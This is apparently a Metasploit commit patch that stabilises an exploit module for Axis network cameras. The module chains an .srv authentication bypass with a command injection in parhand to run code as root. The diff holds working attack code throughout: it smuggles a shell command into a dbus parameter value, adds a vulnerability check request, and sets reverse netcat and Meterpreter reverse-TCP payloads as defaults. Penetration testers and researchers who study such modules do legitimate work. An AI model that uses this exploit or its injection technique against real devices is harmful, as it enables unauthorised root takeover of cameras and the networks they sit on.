From 097a00bcab1d8439b2aeb833679bd3b01fc1814a Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 4 Oct 2018 10:10:28 -0500 Subject: [PATCH] Land #10712, Make exploit/linux/http/axis_srv_parhand_rce more stable --- .../linux/http/axis_srv_parhand_rce.rb | 76 ++++++++++++------- 1 file changed, 50 insertions(+), 26 deletions(-) diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb index b3f3d68bcb..bbd7aa9ab0 100644 --- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb +++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb @@ -12,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Axis Network Camera .srv to parhand RCE', - 'Description' => %q{ + 'Name' => 'Axis Network Camera .srv to parhand RCE', + 'Description' => %q{ This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user. }, - 'Author' => [ + 'Author' => [ 'Or Peles', # Vulnerability discovery (VDOO) 'wvu', # Metasploit module 'sinn3r', # Metasploit module @@ -28,40 +28,62 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Lee', # Metasploit module 'Cale Black' # Metasploit module ], - 'References' => [ + 'References' => [ ['CVE', '2018-10660'], ['CVE', '2018-10661'], ['CVE', '2018-10662'], ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'], ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf'] ], - 'DisclosureDate' => 'Jun 18 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_ARMLE], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 18 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_ARMLE], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => { - 'BadChars' => ' ', - 'Encoder' => 'cmd/ifs', - 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'} - } + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => ' ', + 'Encoder' => 'cmd/ifs', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat-e' + } + }, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' + } ] ], - 'DefaultTarget' => 1, - 'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'} + 'DefaultTarget' => 1, + 'DefaultOptions' => {'WfsDelay' => 10} )) end + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => "/index.html/#{rand_srv}" + ) + + if res && res.code == 204 + return CheckCode::Appears + end + + CheckCode::Safe + end + def exploit case target['Type'] when :unix_memory @@ -72,8 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" - send_request_cgi( 'method' => 'POST', 'uri' => "/index.html/#{rand_srv}", @@ -81,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote 'action' => 'dbus', 'args' => dbus_send( method: :set_param, - param: "string:root.Time.DST.Enabled string:;#{cmd}" + param: "string:root.Time.DST.Enabled string:;(#{cmd})&" ) } ) @@ -111,4 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote args end + def rand_srv + "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" + end + end